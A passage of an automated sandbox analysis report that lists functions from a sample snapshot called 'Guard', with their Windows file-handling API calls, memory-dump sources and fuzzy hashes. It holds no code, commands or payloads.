                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    • Opcode ID: d65179bb357e2ee9df2bb8e24714434edcbb14a7968738994b6ad5d969a860ba
                                                                                                                                                                                                                    • Instruction ID: 7ce0633412fc04a717eed9494296ee8e53e58f7fd0db9069aaa5aee2871e6a80
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d65179bb357e2ee9df2bb8e24714434edcbb14a7968738994b6ad5d969a860ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44B09238002740569D3A1E3C19880E9330558423ADBDA1B81E5789A8E39239888BA524
                                                                                                                                                                                                                    Function 003BC270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003B4005: FindFirstFileW.KERNEL32(?,?), ref: 003B407C
                                                                                                                                                                                                                      • Part of subcall function 003B4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 003B40CC
                                                                                                                                                                                                                      • Part of subcall function 003B4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 003B40DD
                                                                                                                                                                                                                      • Part of subcall function 003B4005: FindClose.KERNEL32(00000000), ref: 003B40F4
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003BC292
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2191629493-0
                                                                                                                                                                                                                    • Opcode ID: c969b963ac7d0d46446110d77e2c95f7620fcbd383a962b92ec56e54dcb45a5d
                                                                                                                                                                                                                    • Instruction ID: 7910b8a3ee394038aaebca83f72a06f412c820e2dad10b79fa887de3607b72f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c969b963ac7d0d46446110d77e2c95f7620fcbd383a962b92ec56e54dcb45a5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF0A7352101104FCB16EF59D840F59B7E5AF44324F05C419F9058F352CB74BC41CB94
                                                                                                                                                                                                                    Function 003642CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00392F8B), ref: 003642EF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                    • Opcode ID: 1fc87071bba6210051a706bf289d00511968b49f22faff1d5365e2f2bfced6e2
                                                                                                                                                                                                                    • Instruction ID: ea3fc365ab534974ca9f31636834bbd65948b1921fe40d154cbaf5c27337a491
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fc87071bba6210051a706bf289d00511968b49f22faff1d5365e2f2bfced6e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0E09279800B01CFC7324F1AE814412FBE8FFE53613218E2EE0E692A64D3B0589A8B50